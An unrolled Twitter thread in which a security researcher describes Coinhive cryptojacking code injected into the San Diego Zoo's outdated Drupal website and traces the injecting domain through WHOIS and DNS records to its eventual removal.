#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking.
How did it get there? @ninoseki shares the details here:
As for why did it happen, we can clearly see the site is running an outdated (vulnerable) version of #Drupal.
I've contacted @sandiegozoo and advised them to remove the code ASAP and update to the latest Drupal version.
Coinhive is injected via obfuscated code found in zoo.sandiegozoo.org/misc/jquery.on…
So who owns vuuwd.com?
WHOIS records indicate it belongs to "X XYZ" who lives on "joker joker" street in China.
While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information.
For now we'll stick with the facts at hand:
@sandiegozoo's website compromised to run #Coinhive
Domain used to inject the malware: vuuwd.com
Current hosting provider: @QuadraNet
Domain registrar: @Namecheap
Looking at the historical DNS records on @securitytrails we find vuuwd.com was recently involved in Monero (XMR) mining operations. So it seems fitting to continue the trend with today's cryptojacking incident using #Coinhive.
#Coinhive has been removed from the @sandiegozoo website. @urlscanio confirms the site is clean now as well.
Please unroll.
Share this Scrolly Tale with your friends.
A Scrolly Tale is a new way to read Twitter threads with a more visually immersive experience.
Discover more beautiful Scrolly Tales like this.